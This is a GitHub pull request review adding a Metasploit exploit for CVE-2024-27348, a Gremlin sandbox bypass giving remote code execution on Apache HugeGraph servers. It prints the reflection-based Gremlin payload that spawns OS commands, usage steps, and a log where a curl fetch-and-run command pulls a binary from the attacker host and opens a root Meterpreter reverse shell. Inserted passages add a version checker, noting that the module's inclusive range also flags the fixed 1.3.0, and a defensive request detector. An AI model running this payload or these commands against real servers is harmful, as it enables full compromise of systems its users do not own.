
Apache HugeGraph Gremlin RCE (CVE-2024-27348) #19348

Merged: 6 commits into rapid7:master on Aug 14, 2024

Conversation

jheysel-r7

@jheysel-r7 jheysel-r7 commented Jul 29, 2024

This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server.

Vulnerable Target Setup

docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: use linux/http/apache_hugegraph_gremlin_rce
  • Set the RHOST and LHOST options
  • Run the module
  • Receive a Meterpreter session as the root user.

```ruby
'Privileged' => true,
'Arch' => [ ARCH_CMD ],
'Targets' => [
  [ 'Automatic Target', {}]
```

@dledda-r7 dledda-r7 Jul 30, 2024


I was wondering whether it is possible, and makes sense, to also have a Java Meterpreter target?

jheysel-r7 (author)

It's likely possible to have a Java Meterpreter target. If Apache HugeGraph was able to be installed on Windows I probably would have focused on a Java target which could have satisfied both Linux and Windows installations. Since it cannot be installed on Windows I decided to focus just on the ARCH_CMD for Linux based systems.

I think because the ARCH_CMD target is able to deliver a Meterpreter session I'll leave it as is; however, if you or anyone else feels it would be beneficial to add an ARCH_JAVA target, I'd be happy to investigate further.

@cgranleese-r7 cgranleese-r7 self-assigned this Aug 1, 2024
@cgranleese-r7

Got a root session, everything seems to be working as expected 👍

```
msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > run

[*] Command to run on remote host: curl -so ./sfpgsQZIU http://<ip>:8080/VtUnMtEdkI5A0Lv6Y2zkFw; chmod +x ./sfpgsQZIU; ./sfpgsQZIU &
[*] Fetch handler listening on <ip>:8080
[*] HTTP server started
[*] Adding resource /VtUnMtEdkI5A0Lv6Y2zkFw
[*] Started reverse TCP handler on <ip>:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
[*] 127.0.0.1:8080 - Running exploit with payload: cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Client <ip> requested /VtUnMtEdkI5A0Lv6Y2zkFw
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:63424) at 2024-08-01 10:11:31 +0100

meterpreter > pwd
/hugegraph
meterpreter > ls -la
Listing: /hugegraph
===================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  557    fil   2023-09-15 03:39:01 +0100  DISCLAIMER
100644/rw-r--r--  53393  fil   2023-09-15 03:39:01 +0100  LICENSE
100644/rw-r--r--  65881  fil   2023-09-15 03:39:01 +0100  NOTICE
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  bin
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  conf
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  ext
040755/rwxr-xr-x  20480  dir   2024-08-01 10:07:42 +0100  lib
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  licenses
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  logs
040755/rwxr-xr-x  4096   dir   2023-09-15 03:39:39 +0100  plugins
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  rocksdb-data
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  scripts
100755/rwxr-xr-x  250    fil   2024-08-01 10:11:31 +0100  sfpgsQZIU
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  swagger-ui

meterpreter > getuid
Server username: root
meterpreter >
```

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
Contributor

I'm assuming the module path was updated at some point, as this seems to be outdated now:

Suggested change
```diff
-1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
+1. Do: `use exploit/linux/http/apache_hugegraph_gremlin_rce`
```


### Apache HugeGraph 1.0.0 docker instance
```
msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
```
Contributor

If the module path does need to be updated, just adding a reminder to update this section as well.

Comment on lines 63 to 67
```ruby
if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
  CheckCode::Appears("Apache HugeGraph version detected: #{version}")
else
  CheckCode::Safe("Apache HugeGraph version detected: #{version}")
end
```
Contributor

Suggested change
```diff
-if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
-  CheckCode::Appears("Apache HugeGraph version detected: #{version}")
-else
-  CheckCode::Safe("Apache HugeGraph version detected: #{version}")
-end
+if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
+  CheckCode::Appears("Apache HugeGraph version detected: #{version}")
+end
+CheckCode::Safe("Apache HugeGraph version detected: #{version}")
```
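Two points worth checking against the snippets above before relying on this version gate: `Comparable#between?`, which Rex::Version inherits, is inclusive at both ends, so the 1.0.0..1.3.0 range also reports 1.3.0 (the fixed release) as vulnerable, and the suggested form needs a `return` before `CheckCode::Appears`, since otherwise the method evaluates on to the trailing `CheckCode::Safe`. The following is an added example, not the module's code, using plain Gem::Version (which Rex::Version is built on) with an exclusive upper bound:

```ruby
require 'rubygems'

# Boundaries as used by the module's check: 1.0.0 is the earliest release it
# treats as affected; 1.3.0 is the fixed release and must NOT be flagged.
AFFECTED_MIN = Gem::Version.new('1.0.0')
FIXED_AT     = Gem::Version.new('1.3.0')

# Returns :affected, :fixed, :below_range, or :unknown when the version string
# is empty or unparsable (e.g. a banner that exposes no version at all).
def hugegraph_version_status(version)
  str = version.to_s.strip
  return :unknown if str.empty? || !Gem::Version.correct?(str)

  v = Gem::Version.new(str)
  # Exclusive upper bound: "versions before 1.3.0" excludes 1.3.0 itself.
  return :affected if v >= AFFECTED_MIN && v < FIXED_AT

  v >= FIXED_AT ? :fixed : :below_range
end

if __FILE__ == $PROGRAM_NAME
  %w[1.0.0 1.2.0 1.3.0 1.3.1 0.12.0 not-a-version].each do |ver|
    puts "#{ver}: #{hugegraph_version_status(ver)}"
  end
end
```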

Comment on lines 85 to 86
```ruby
data = {
  'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
```
Contributor

I think it would be nice to have the payload properly formatted, then joined into a single line before sending it.
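From the defender's side, the reflection chain quoted above doubles as a detection signature: a Gremlin traversal has no reason to load classes by name, override member accessibility, rename its thread or touch ProcessBuilder. The following is an added example, not part of the module or of HugeGraph, that classifies Gremlin request bodies by those indicators; it assumes the `{"gremlin": "<script>"}` JSON body shape the module sends, and the sample bodies are constructed, not captured traffic.

```ruby
require 'json'

# Indicators taken from the payload quoted in this review thread; a graph
# traversal has no legitimate use for any of them.
INDICATORS = {
  'reflective-class-load' => /Class\.forName\s*\(/,
  'reflection-api'        => /java\.lang\.reflect\.(Field|Method|Constructor)/,
  'access-override'       => /\.setAccessible\s*\(\s*true\s*\)/,
  'thread-rename'         => /getDeclaredField\s*\(\s*"name"\s*\)/,
  'process-spawn'         => /ProcessBuilder/
}.freeze

# Returns the names of every indicator present in a raw Gremlin script.
def gremlin_indicators(script)
  INDICATORS.select { |_, re| script.match?(re) }.keys
end

# Classifies one request body of the form {"gremlin": "<script>"}.
# Bodies that do not parse, or carry no string script, are reported as
# :malformed rather than silently passing as clean.
def classify_gremlin_request(body)
  parsed = JSON.parse(body)
  script = parsed.is_a?(Hash) ? parsed['gremlin'] : nil
  return { verdict: :malformed, indicators: [] } unless script.is_a?(String)
  hits = gremlin_indicators(script)
  verdict = if hits.include?('process-spawn') then :critical
            elsif hits.empty? then :clean
            else :suspicious
            end
  { verdict: verdict, indicators: hits }
rescue JSON::ParserError
  { verdict: :malformed, indicators: [] }
end

# Constructed sample bodies (not captured traffic): an ordinary traversal and
# a script carrying the reflection chain from the payload above.
BENIGN_BODY = { 'gremlin' => "g.V().has('name', 'marko').out('knows').values('name')" }.to_json
BYPASS_BODY = { 'gremlin' =>
  'Thread t = Thread.currentThread();' \
  'Class c = Class.forName("java.lang.Thread");' \
  'java.lang.reflect.Field f = c.getDeclaredField("name");' \
  'f.setAccessible(true);f.set(t, "t");' \
  'Class pb = Class.forName("java.lang.ProcessBuilder");' }.to_json

if __FILE__ == $PROGRAM_NAME
  [BENIGN_BODY, BYPASS_BODY].each { |b| puts classify_gremlin_request(b).inspect }
end
```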

@jheysel-r7
Contributor Author

@msjenkins-r7 test this please

@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 14, 2024
@cgranleese-r7 cgranleese-r7 merged commit 36322ff into rapid7:master Aug 14, 2024
40 checks passed
@cgranleese-r7

Release Notes

Adds an Apache HugeGraph Server exploit for GHSA-29rc-vq7f-x335, which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server.
